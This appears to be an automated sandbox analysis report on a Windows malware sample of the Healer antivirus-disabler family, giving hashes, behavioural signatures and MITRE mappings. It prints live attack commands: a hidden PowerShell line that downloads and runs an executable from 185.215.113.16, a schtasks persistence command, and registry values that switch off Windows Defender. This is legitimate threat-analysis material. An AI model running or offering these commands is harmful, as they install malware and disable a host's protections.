Analysis
-
max time kernel
93s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 21:53
Static task
static1
Behavioral task
behavioral1
Sample
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe
Resource
win7-20241010-en
General
-
Target
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe
-
Size
938KB
-
MD5
f8363b39122ec442ddf9d5064da011dd
-
SHA1
edc3a725b2e83e15d7f002b8fd249348e7725737
-
SHA256
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390
-
SHA512
e9e4eb4675ab3f5ec8653f5b131b3d2f4c74b4bf2208fceecf87b707e54adbb8107b5ce4f3339297e88f58aaf1bce46ed1631ae03e99f8143672e1c264392a3c
-
SSDEEP
24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8aeKl:6TvC/MTQYxsWR7aeK
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3452-38-0x0000000000BF0000-0x000000000105C000-memory.dmp healer behavioral2/memory/3452-39-0x0000000000BF0000-0x000000000105C000-memory.dmp healer behavioral2/memory/3452-44-0x0000000000BF0000-0x000000000105C000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 10 4344 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4344 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 10 4344 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4748 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4344 powershell.exe 4344 powershell.exe 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 3452 TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4120 wrote to memory of 5020 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 84 PID 4120 wrote to memory of 5020 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 84 PID 4120 wrote to memory of 5020 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 84 PID 4120 wrote to memory of 2320 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 85 PID 4120 wrote to memory of 2320 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 85 PID 4120 wrote to memory of 2320 4120 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 85 PID 5020 wrote to memory of 4748 5020 cmd.exe 87 PID 5020 wrote to memory of 4748 5020 cmd.exe 87 PID 5020 wrote to memory of 4748 5020 cmd.exe 87 PID 2320 wrote to memory of 4344 2320 mshta.exe 89 PID 2320 wrote to memory of 4344 2320 mshta.exe 89 PID 2320 wrote to memory of 4344 2320 mshta.exe 89 PID 4344 wrote to memory of 3452 4344 powershell.exe 91 PID 4344 wrote to memory of 3452 4344 powershell.exe 91 PID 4344 wrote to memory of 3452 4344 powershell.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe"C:\Users\Admin\AppData\Local\Temp\3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 4mOM0maZGCb /tr "mshta C:\Users\Admin\AppData\Local\Temp\OHsTsGrtF.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 4mOM0maZGCb /tr "mshta C:\Users\Admin\AppData\Local\Temp\OHsTsGrtF.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4748
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\OHsTsGrtF.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE"C:\Users\Admin\AppData\Local\TempOTHGTC6OY3TZ8F9JQAIFVSXVO5LWFDR6.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3452
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
5Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD57484497cd31ac2475808772a30efd8fa
SHA16e1e52d91ec5789bc69ef7a558482bb309b4941d
SHA2564532c7f02d37367f66b795ae3f7e1b84fb1d99e7ec10babeb696a1dc35d371dd
SHA5128ea28fe59f941b2fb9c6112bae5df59b249280daaa909b968411ed4b95fe23a041194ac26ea9d3ac4a628197960a44e46825e29a9ee9042c12acec7a16d228ce
-
Filesize
726B
MD518929cd2d6d2d8e08a77b45d06527c62
SHA1587cee6017dcbc872fccaf2db30ee9531f5d105f
SHA256bf2d32df9d759f6dff9ca5714c95ef4bcd872a1c638dc2a7f082caeff869b369
SHA5125ee98c37e3b3f4f3dc8b554ea95fa243c4daee4076b7c9beba54e389298fe9314c84d339378ad4ad1f7764f39e18b2a732b4ebc47e6c6ae3ddfb66e87c1682c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82